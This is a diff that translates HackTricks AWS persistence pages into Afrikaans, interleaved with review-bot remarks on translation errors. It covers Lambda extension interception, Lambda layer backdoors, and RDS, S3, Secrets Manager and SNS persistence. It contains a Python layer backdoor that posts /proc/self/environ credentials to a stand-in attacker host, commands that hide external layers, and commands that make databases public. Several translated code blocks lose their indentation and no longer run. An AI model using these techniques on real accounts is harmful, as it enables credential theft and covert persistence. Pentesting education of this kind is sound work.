-The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions. +Die veranderlike **`AWS_LAMBDA_RUNTIME_API`** dui die **IP** adres en **poort** nommer van die Rapid API aan **kind runtime prosesse** en addisionele uitbreidings. > [!WARNING] -> By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number. +> Deur die **`AWS_LAMBDA_RUNTIME_API`** omgewing veranderlike na 'n **`poort`** wat ons toegang tot het, is dit moontlik om alle aksies binne die Lambda-runtime te onderskep (**man-in-the-middle**). Dit is moontlik omdat die uitbreiding met dieselfde voorregte as Rapid Init loop, en die stelselkern toelaat **modifikasie van prosesgeheue**, wat die verandering van die poortnommer moontlik maak. -Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment. +Omdat **uitbreidings voor enige runtime-kode loop**, sal die modifikasie van die omgewing veranderlike die runtime-proses (bv. Python, Java, Node, Ruby) beïnvloed soos dit begin. Verder, **uitbreidings wat na** ons gelaai word, wat op hierdie veranderlike staatmaak, sal ook deur ons uitbreiding lei. 
Hierdie opstelling kan malware in staat stel om sekuriteitsmaatreëls of registrasie-uitbreidings heeltemal te omseil direk binne die runtime-omgewing.

https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png

-The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**. +Die hulpmiddel [**lambda-spy**](https://github.com/clearvector/lambda-spy) is geskep om daardie **geheue skrywe** en **sensitiewe inligting** van lambda versoeke te steel, ander **uitbreidings** **versoeke** en selfs **te modifiseer**. -## References +## Verwysings - [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) - [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md index f8a5e2868..c6d9bced4 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md 
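Review bot: several terms in the aws-abusing-lambda-extensions.md hunk are mistranslated: "waaksaamheid" means vigilance, not observability (use "waarneembaarheid"); "registrasie-uitbreidings" means registration extensions where the English has "logging extensions" (use "logging-uitbreidings" or "logboek-uitbreidings"); "saamgecompileer" and "stelsels oproepe" should be "gekompileer" and "stelseloproepe"; and "na 'n **`poort`** wat ons toegang tot het" should be "waartoe ons toegang het". The closing sentence dropped a verb: "is geskep om daardie **geheue skrywe** en **sensitiewe inligting** van lambda versoeke te steel" reads as "created to steal that memory write", whereas the English is "to perform that memory write and steal sensitive information", so it needs "om daardie geheueskrywe uit te voer en sensitiewe inligting ... te steel". The typo "Java Correto" in the internal-extensions bullet is carried over from the English while the external-extensions bullet spells it "Corretto"; align both on "Corretto".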
@@ -4,79 +4,72 @@ ## Lambda Layers -A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files. +'n Lambda-laag is 'n .zip-lĂȘerargief wat **addisionele kode** of ander inhoud **kan bevat**. 'n Laag kan biblioteke, 'n [aangepaste runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data of konfigurasielĂȘers bevat. -It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment. +Dit is moontlik om tot **vyf lae per funksie** in te sluit. Wanneer jy 'n laag in 'n funksie insluit, word die **inhoud na die `/opt`** gids in die uitvoeringsomgewing **onttrek**. -By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version. +Deur **standaard** is die **lae** wat jy skep **privaat** vir jou AWS-rekening. Jy kan kies om 'n laag met ander rekeninge te **deel** of om die laag **publiek** te **maak**. As jou funksies 'n laag gebruik wat 'n ander rekening gepubliseer het, kan jou funksies **voortgaan om die laag weergawe te gebruik nadat dit verwyder is, of nadat jou toestemming om toegang tot die laag te verkry, ingetrek is**. Jy kan egter nie 'n nuwe funksie skep of funksies opdateer wat 'n verwyderde laag weergawe gebruik nie. -Functions deployed as a container image do not use layers. 
Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image. +Funksies wat as 'n houerbeeld ontplooi word, gebruik nie lae nie. In plaas daarvan, pak jy jou verkiesde runtime, biblioteke en ander afhanklikhede in die houerbeeld wanneer jy die beeld bou. ### Python load path -The load path that Python will use in lambda is the following: - +Die laai-pad wat Python in lambda sal gebruik, is die volgende: ``` ['/var/task', '/opt/python/lib/python3.9/site-packages', '/opt/python', '/var/runtime', '/var/lang/lib/python39.zip', '/var/lang/lib/python3.9', '/var/lang/lib/python3.9/lib-dynload', '/var/lang/lib/python3.9/site-packages', '/opt/python/lib/python3.9/site-packages'] ``` - -Check how the **second** and third **positions** are occupy by directories where **lambda layers** uncompress their files: **`/opt/python/lib/python3.9/site-packages`** and **`/opt/python`** +Kontroleer hoe die **tweede** en derde **posisies** beset word deur gidse waar **lambda layers** hul lĂȘers ontsyfer: **`/opt/python/lib/python3.9/site-packages`** en **`/opt/python`** > [!CAUTION] -> If an attacker managed to **backdoor** a used lambda **layer** or **add one** that will be **executing arbitrary code when a common library is loaded**, he will be able to execute malicious code with each lambda invocation. +> As 'n aanvaller daarin slaag om 'n gebruikte lambda **layer** te **backdoor** of **een toe te voeg** wat **arbitraire kode sal uitvoer wanneer 'n algemene biblioteek gelaai word**, sal hy in staat wees om kwaadwillige kode met elke lambda-aanroep uit te voer. -Therefore, the requisites are: +Daarom is die vereistes: -- **Check libraries** that are **loaded** by the victims code -- Create a **proxy library with lambda layers** that will **execute custom code** and **load the original** library. 
+- **Kontroleer biblioteke** wat deur die slagofferskode **gelaai** word +- Skep 'n **proxy-biblioteek met lambda layers** wat **aangepaste kode sal uitvoer** en die **oorspronklike** biblioteek **sal laai**. -### Preloaded libraries +### Vooraf gelaaide biblioteke > [!WARNING] -> When abusing this technique I found a difficulty: Some libraries are **already loaded** in python runtime when your code gets executed. I was expecting to find things like `os` or `sys`, but **even `json` library was loaded**.\ -> In order to abuse this persistence technique, the code needs to **load a new library that isn't loaded** when the code gets executed. - -With a python code like this one it's possible to obtain the **list of libraries that are pre loaded** inside python runtime in lambda: +> Wanneer ek hierdie tegniek misbruik, het ek 'n moeilikheid gevind: Sommige biblioteke is **reeds gelaai** in die python runtime wanneer jou kode uitgevoer word. Ek het verwag om dinge soos `os` of `sys` te vind, maar **selfs die `json` biblioteek was gelaai**.\ +> Ten einde hierdie volhardingstegniek te misbruik, moet die kode 'n **nuwe biblioteek laai wat nie gelaai is** wanneer die kode uitgevoer word nie. 
+Met 'n python kode soos hierdie is dit moontlik om die **lys van biblioteke wat vooraf gelaai is** binne python runtime in lambda te verkry: ```python import sys def lambda_handler(event, context): - return { - 'statusCode': 200, - 'body': str(sys.modules.keys()) - } +return { +'statusCode': 200, +'body': str(sys.modules.keys()) +} ``` - -And this is the **list** (check that libraries like `os` or `json` are already there) - +En dit is die **lys** (kontroleer dat biblioteke soos `os` of `json` reeds daar is) ``` 'sys', 'builtins', '_frozen_importlib', '_imp', '_thread', '_warnings', '_weakref', '_io', 'marshal', 'posix', '_frozen_importlib_external', 'time', 'zipimport', '_codecs', 'codecs', 'encodings.aliases', 'encodings', 'encodings.utf_8', '_signal', 'encodings.latin_1', '_abc', 'abc', 'io', '__main__', '_stat', 'stat', '_collections_abc', 'genericpath', 'posixpath', 'os.path', 'os', '_sitebuiltins', 'pwd', '_locale', '_bootlocale', 'site', 'types', 'enum', '_sre', 'sre_constants', 'sre_parse', 'sre_compile', '_heapq', 'heapq', 'itertools', 'keyword', '_operator', 'operator', 'reprlib', '_collections', 'collections', '_functools', 'functools', 'copyreg', 're', '_json', 'json.scanner', 'json.decoder', 'json.encoder', 'json', 'token', 'tokenize', 'linecache', 'traceback', 'warnings', '_weakrefset', 'weakref', 'collections.abc', '_string', 'string', 'threading', 'atexit', 'logging', 'awslambdaric', 'importlib._bootstrap', 'importlib._bootstrap_external', 'importlib', 'awslambdaric.lambda_context', 'http', 'email', 'email.errors', 'binascii', 'email.quoprimime', '_struct', 'struct', 'base64', 'email.base64mime', 'quopri', 'email.encoders', 'email.charset', 'email.header', 'math', '_bisect', 'bisect', '_random', '_sha512', 'random', '_socket', 'select', 'selectors', 'errno', 'array', 'socket', '_datetime', 'datetime', 'urllib', 'urllib.parse', 'locale', 'calendar', 'email._parseaddr', 'email.utils', 'email._policybase', 'email.feedparser', 'email.parser', 'uu', 
'email._encoded_words', 'email.iterators', 'email.message', '_ssl', 'ssl', 'http.client', 'runtime_client', 'numbers', '_decimal', 'decimal', '__future__', 'simplejson.errors', 'simplejson.raw_json', 'simplejson.compat', 'simplejson._speedups', 'simplejson.scanner', 'simplejson.decoder', 'simplejson.encoder', 'simplejson', 'awslambdaric.lambda_runtime_exception', 'awslambdaric.lambda_runtime_marshaller', 'awslambdaric.lambda_runtime_client', 'awslambdaric.bootstrap', 'awslambdaric.__main__', 'lambda_function' ``` +En dit is die lys van **biblioteke** wat **lambda standaard ingesluit het**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3) -And this is the list of **libraries** that **lambda includes installed by default**: [https://gist.github.com/gene1wood/4a052f39490fae00e0c3](https://gist.github.com/gene1wood/4a052f39490fae00e0c3) +### Lambda Laag Backdooring -### Lambda Layer Backdooring +In hierdie voorbeeld kom ons veronderstel dat die geteikende kode **`csv`** invoer. Ons gaan die **invoer van die `csv` biblioteek backdoor**. -In this example lets suppose that the targeted code is importing **`csv`**. We are going to be **backdooring the import of the `csv` library**. 
+Om dit te doen, gaan ons die **gids csv** skep met die lĂȘer **`__init__.py`** daarin in 'n pad wat deur lambda gelaai word: **`/opt/python/lib/python3.9/site-packages`**\ +Dan, wanneer die lambda uitgevoer word en probeer om **csv** te laai, sal ons **`__init__.py` lĂȘer gelaai en uitgevoer word**.\ +Hierdie lĂȘer moet: -For doing that, we are going to **create the directory csv** with the file **`__init__.py`** on it in a path that is loaded by lambda: **`/opt/python/lib/python3.9/site-packages`**\ -Then, when the lambda is executed and try to load **csv**, our **`__init__.py` file will be loaded and executed**.\ -This file must: - -- Execute our payload -- Load the original csv library - -We can do both with: +- Ons payload uitvoer +- Die oorspronklike csv biblioteek laai +Ons kan albei doen met: ```python import sys from urllib import request with open("/proc/self/environ", "rb") as file: - url= "https://attacker13123344.com/" #Change this to your server - req = request.Request(url, data=file.read(), method="POST") - response = request.urlopen(req) +url= "https://attacker13123344.com/" #Change this to your server +req = request.Request(url, data=file.read(), method="POST") +response = request.urlopen(req) # Remove backdoor directory from path to load original library del_path_dir = "/".join(__file__.split("/")[:-2]) 
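Review bot: this hunk strips the leading indentation inside the Python code blocks and leaves them syntactically invalid. Under `def lambda_handler(event, context):` the body now starts at column 0 (`+return {`, `+'statusCode': 200,`), and after `with open("/proc/self/environ", "rb") as file:` the lines `+url= "https://attacker13123344.com/"`, `+req = request.Request(...)` and `+response = request.urlopen(req)` are unindented; both snippets raise IndentationError if pasted as shown. Keep the indentation the removed `-` lines had and translate only the prose. On wording: "waar **lambda layers** hul lĂȘers ontsyfer" says the layers decipher their files, where the English is "uncompress", so "uitpak"; and the "### Python load path" heading was left in English while the neighbouring headings were translated.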
@@ -90,29 +83,27 @@ import csv as _csv sys.modules["csv"] = _csv ``` +Dan, skep 'n zip met hierdie kode in die pad **`python/lib/python3.9/site-packages/__init__.py`** en voeg dit as 'n lambda-laag by. -Then, create a zip with this code in the path **`python/lib/python3.9/site-packages/__init__.py`** and add it as a lambda layer. +Jy kan hierdie kode vind in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor) -You can find this code in [**https://github.com/carlospolop/LambdaLayerBackdoor**](https://github.com/carlospolop/LambdaLayerBackdoor) - -The integrated payload will **send the IAM creds to a server THE FIRST TIME it's invoked or AFTER a reset of the lambda container** (change of code or cold lambda), but **other techniques** such as the following could also be integrated: +Die geĂŻntegreerde payload sal **die IAM kredensiale na 'n bediener stuur DIE EERSTE KEER wat dit aangeroep word of NA 'n reset van die lambda houer** (verandering van kode of koue lambda), maar **ander tegnieke** soos die volgende kan ook geĂŻntegreer word: {{#ref}} ../../aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md {{#endref}} -### External Layers +### Eksterne Lae -Note that it's possible to use **lambda layers from external accounts**. Moreover, a lambda can use a layer from an external account even if it doesn't have permissions.\ -Also note that the **max number of layers a lambda can have is 5**. +Let daarop dat dit moontlik is om **lambda-lae van eksterne rekeninge** te gebruik. Boonop kan 'n lambda 'n laag van 'n eksterne rekening gebruik selfs al het dit nie toestemmings nie.\ +Let ook daarop dat die **maksimum aantal lae wat 'n lambda kan hĂȘ 5 is**. 
-Therefore, in order to improve the versatility of this technique an attacker could: - -- Backdoor an existing layer of the user (nothing is external) -- **Create** a **layer** in **his account**, give the **victim account access** to use the layer, **configure** the **layer** in victims Lambda and **remove the permission**. - - The **Lambda** will still be able to **use the layer** and the **victim won't** have any easy way to **download the layers code** (apart from getting a rev shell inside the lambda) - - The victim **won't see external layers** used with **`aws lambda list-layers`** +Daarom, om die veelsydigheid van hierdie tegniek te verbeter, kan 'n aanvaller: +- 'n Buitelug in 'n bestaande laag van die gebruiker (niks is ekstern) +- **Skep** 'n **laag** in **sy rekening**, gee die **slagoffer rekening toegang** om die laag te gebruik, **konfigureer** die **laag** in die slagoffer se Lambda en **verwyder die toestemming**. +- Die **Lambda** sal steeds in staat wees om die **laag** te **gebruik** en die **slagoffer sal** nie enige maklike manier hĂȘ om die **laag se kode af te laai** (behalwe om 'n rev shell binne die lambda te kry) +- Die slagoffer **sal nie eksterne lae** sien wat gebruik word met **`aws lambda list-layers`** ```bash # Upload backdoor layer aws lambda publish-layer-version --layer-name "ExternalBackdoor" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6" @@ -126,9 +117,4 @@ aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statemen # Remove permissions aws lambda remove-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 ``` - {{#include ../../../../banners/hacktricks-training.md}} - - - - 
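Review bot: "'n Buitelug in 'n bestaande laag van die gebruiker" is not a translation of "Backdoor an existing layer of the user" ("buitelug" is open air); use "Plaas 'n agterdeur in 'n bestaande laag van die gebruiker". The word for backdoor is also inconsistent across the patch: this file keeps the English "backdoor"/"Backdooring" ("### Lambda Laag Backdooring", "te **backdoor**"), the lambda-persistence file uses "terugdeur" and the lightsail file uses "agterdeur"; pick one ("agterdeur" is the usual Afrikaans term) and use it everywhere. The `aws lambda publish-layer-version` / `add-layer-version-permission` / `remove-layer-version-permission` block is unchanged apart from a removed blank line, which is fine.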
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md index 88b0d082a..3bfc1378e 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md 
@@ -1,37 +1,33 @@ -# AWS - Lightsail Persistence +# AWS - Lightsail Persistensie {{#include ../../../banners/hacktricks-training.md}} ## Lightsail -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-lightsail-enum.md {{#endref}} -### Download Instance SSH keys & DB passwords +### Laai Instansie SSH sleutels & DB wagwoorde af -They won't be changed probably so just having them is a good option for persistence +Hulle sal waarskynlik nie verander word nie, so om hulle te hĂȘ is 'n goeie opsie vir persistensie -### Backdoor Instances +### Agterdeur Instansies -An attacker could get access to the instances and backdoor them: +'n Aanvaller kan toegang tot die instansies verkry en hulle agterdeur: -- Using a traditional **rootkit** for example -- Adding a new **public SSH key** -- Expose a port with port knocking with a backdoor +- Gebruik 'n tradisionele **rootkit** byvoorbeeld +- Voeg 'n nuwe **publieke SSH-sleutel** by +- Stel 'n poort bloot met poortklop met 'n agterdeur -### DNS persistence +### DNS persistensie -If domains are configured: +As domeine gekonfigureer is: -- Create a subdomain pointing your IP so you will have a **subdomain takeover** -- Create **SPF** record allowing you to send **emails** from the domain -- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones +- Skep 'n subdomein wat jou IP aandui sodat jy 'n **subdomein oorneem** sal hĂȘ +- Skep **SPF** rekord wat jou toelaat om **e-posse** van die domein te stuur +- Konfigureer die **hoofdomein IP na jou eie** en voer 'n **MitM** uit van jou IP na die wettige een {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md index b7a4b8f7b..0e1825177 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md 
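Review bot: "'n Aanvaller kan toegang tot die instansies verkry en hulle agterdeur" uses the noun as a verb; "en 'n agterdeur daarin plaas" reads naturally. "Skep 'n subdomein wat jou IP aandui" should be "wat na jou IP wys", and the English "the legit ones" (plural) became "die wettige een"; "die wettige IP's" keeps the meaning. The page title uses "Persistensie" while the lambda pages in this same patch translate "persistence" as "volharding"; use one term throughout.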
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md @@ -1,35 +1,27 @@ -# AWS - RDS Persistence +# AWS - RDS Persistensie {{#include ../../../banners/hacktricks-training.md}} ## RDS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-relational-database-rds-enum.md {{#endref}} -### Make instance publicly accessible: `rds:ModifyDBInstance` - -An attacker with this permission can **modify an existing RDS instance to enable public accessibility**. +### Maak instansie publiek toeganklik: `rds:ModifyDBInstance` +'n Aanvaller met hierdie toestemming kan **'n bestaande RDS-instansie wysig om publieke toeganklikheid te aktiveer**. ```bash aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately ``` +### Skep 'n admin gebruiker binne die DB -### Create an admin user inside the DB - -An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database. - -### Make snapshot public +'n Aanvaller kan eenvoudig **'n gebruiker binne die DB skep** sodat selfs as die meester gebruiker se wagwoord gewysig word, hy **nie die toegang verloor** tot die databasis nie. +### Maak snapshot publiek ```bash aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md index f2c4ce048..ad68f8c9a 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md 
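Review bot: `aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all` has no value after `--db-snapshot-identifier` (carried over unchanged from the English), so the CLI rejects the command as written; since this hunk already rewrites the surrounding lines, a placeholder such as `<snapshot-id>` after the flag would make the intent clear without guessing a real identifier. The prose itself ("'n gebruiker binne die DB skep", "meester gebruiker se wagwoord") is fine.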
@@ -1,29 +1,25 @@ -# AWS - S3 Persistence +# AWS - S3 Persistensie {{#include ../../../banners/hacktricks-training.md}} ## S3 -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-s3-athena-and-glacier-enum.md {{#endref}} -### KMS Client-Side Encryption +### KMS KliĂ«nt-Syde Enkripsie -When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again: +Wanneer die enkripsieproses voltooi is, sal die gebruiker die KMS API gebruik om 'n nuwe sleutel te genereer (`aws kms generate-data-key`) en hy sal **die gegenereerde enkripteerde sleutel binne die metadata** van die lĂȘer stoor ([python code voorbeeld](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) sodat wanneer die ontsleuteling plaasvind, dit dit weer met KMS kan ontsleutel:
-Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it. +Daarom kan 'n aanvaller hierdie sleutel uit die metadata verkry en dit met KMS ontsleutel (`aws kms decrypt`) om die sleutel te verkry wat gebruik is om die inligting te enkripteer. Op hierdie manier sal die aanvaller die enkripsiesleutel hĂȘ en as daardie sleutel hergebruik word om ander lĂȘers te enkripteer, sal hy dit kan gebruik. -### Using S3 ACLs +### Gebruik van S3 ACLs -Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket. +Alhoewel ACLs van emmers gewoonlik gedeaktiveer is, kan 'n aanvaller met genoeg voorregte dit misbruik (as dit geaktiveer is of as die aanvaller dit kan aktiveer) om toegang tot die S3-emmer te behou. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md index c15f27003..c416cc07a 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md 
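Review bot: "KMS KliĂ«nt-Syde Enkripsie" is a calque of "Client-Side Encryption"; "KMS Kliëntkant-enkripsie" is the Afrikaans term. In "sodat wanneer die ontsleuteling plaasvind, dit dit weer met KMS kan ontsleutel" the doubled "dit dit" is grammatical but hard to read; "sodat die sleutel by ontsleuteling weer met KMS ontsleutel kan word" is clearer. "python code voorbeeld" mixes languages; "python kode voorbeeld" matches the rest of the page.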
@@ -1,57 +1,51 @@ -# AWS - Secrets Manager Persistence +# AWS - Secrets Manager Persistensie {{#include ../../../banners/hacktricks-training.md}} ## Secrets Manager -For more info check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}} -### Via Resource Policies +### Deur Hulpbronbeleide -It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**. +Dit is moontlik om **toegang tot geheime te verleen aan eksterne rekeninge** deur hulpbronbeleide. Kyk na die [**Secrets Manager Privesc-bladsy**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) vir meer inligting. Let daarop dat om **toegang tot 'n geheim' te verkry, die eksterne rekening ook **toegang tot die KMS-sleutel wat die geheim enkripteer** sal benodig. -### Via Secrets Rotate Lambda +### Deur Secrets Rotate Lambda -To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself. - -This is how lambda code for such action could look like: +Om **geheime** outomaties te **roteer**, word 'n geconfigureerde **Lambda** aangeroep. As 'n aanvaller die **kode** kon **verander**, kon hy direk die **nuwe geheim** na homself **uitvoer**. 
+Dit is hoe lambda-kode vir so 'n aksie kan lyk: ```python import boto3 def rotate_secrets(event, context): - # Create a Secrets Manager client - client = boto3.client('secretsmanager') +# Create a Secrets Manager client +client = boto3.client('secretsmanager') - # Retrieve the current secret value - secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] +# Retrieve the current secret value +secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] - # Rotate the secret by updating its value - new_secret_value = rotate_secret(secret_value) - client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) +# Rotate the secret by updating its value +new_secret_value = rotate_secret(secret_value) +client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) def rotate_secret(secret_value): - # Perform the rotation logic here, e.g., generate a new password +# Perform the rotation logic here, e.g., generate a new password - # Example: Generate a new password - new_secret_value = generate_password() +# Example: Generate a new password +new_secret_value = generate_password() - return new_secret_value +return new_secret_value def generate_password(): - # Example: Generate a random password using the secrets module - import secrets - import string - password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) - return password +# Example: Generate a random password using the secrets module +import secrets +import string +password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) +return password ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md index 8e97cc81c..e9bcdcddc 100644 
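Review bot: the Python block in this hunk is de-indented and no longer valid: `def rotate_secrets(event, context):` is followed by `+# Create a Secrets Manager client` and `+client = boto3.client('secretsmanager')` at column 0, and the same happens inside `rotate_secret` and `generate_password`, so the snippet raises IndentationError when copied; restore the indentation the `-` lines had. In the prose, "kon hy direk die **nuwe geheim** na homself **uitvoer**" uses "uitvoer" (execute/export) for "exfiltrate"; "eksfiltreer" or "na homself stuur" is what is meant. The bold span in "om **toegang tot 'n geheim' te verkry, die eksterne rekening ook **toegang tot die KMS-sleutel ..." is closed with a stray apostrophe instead of `**`, which leaves three `**` markers in the sentence and unbalances the markup.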
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md 
@@ -1,85 +1,77 @@ -# AWS - SNS Persistence +# AWS - SNS Persistensie {{#include ../../../banners/hacktricks-training.md}} ## SNS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-sns-enum.md {{#endref}} -### Persistence - -When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**: +### Persistensie +Wanneer jy 'n **SNS onderwerp** skep, moet jy met 'n IAM-beleid **aangee wie toegang het om te lees en te skryf**. Dit is moontlik om eksterne rekeninge, ARN van rolle, of **selfs "\*"** aan te dui.\ +Die volgende beleid gee almal in AWS toegang om te lees en te skryf in die SNS onderwerp genaamd **`MySNS.fifo`**: ```json { - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__default_statement_ID", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "SNS:Publish", - "SNS:RemovePermission", - "SNS:SetTopicAttributes", - "SNS:DeleteTopic", - "SNS:ListSubscriptionsByTopic", - "SNS:GetTopicAttributes", - "SNS:AddPermission", - "SNS:Subscribe" - ], - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", - "Condition": { - "StringEquals": { - "AWS:SourceOwner": "318142138553" - } - } - }, - { - "Sid": "__console_pub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Publish", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - }, - { - "Sid": "__console_sub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Subscribe", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - } - ] +"Version": "2008-10-17", +"Id": "__default_policy_ID", +"Statement": [ +{ +"Sid": "__default_statement_ID", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"SNS:Publish", 
+"SNS:RemovePermission", +"SNS:SetTopicAttributes", +"SNS:DeleteTopic", +"SNS:ListSubscriptionsByTopic", +"SNS:GetTopicAttributes", +"SNS:AddPermission", +"SNS:Subscribe" +], +"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", +"Condition": { +"StringEquals": { +"AWS:SourceOwner": "318142138553" +} +} +}, +{ +"Sid": "__console_pub_0", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "SNS:Publish", +"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" +}, +{ +"Sid": "__console_sub_0", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "SNS:Subscribe", +"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" +} +] } ``` +### Skep Tekeninge -### Create Subscribers - -To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**. - -Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used. +Om voort te gaan met die eksfiltrasie van al die boodskappe van al die onderwerpe, kan die aanvaller **tekeninge vir al die onderwerpe skep**. +Let daarop dat as die **onderwerp van tipe FIFO** is, slegs tekeninge wat die protokol **SQS** gebruik, gebruik kan word. ```bash aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn 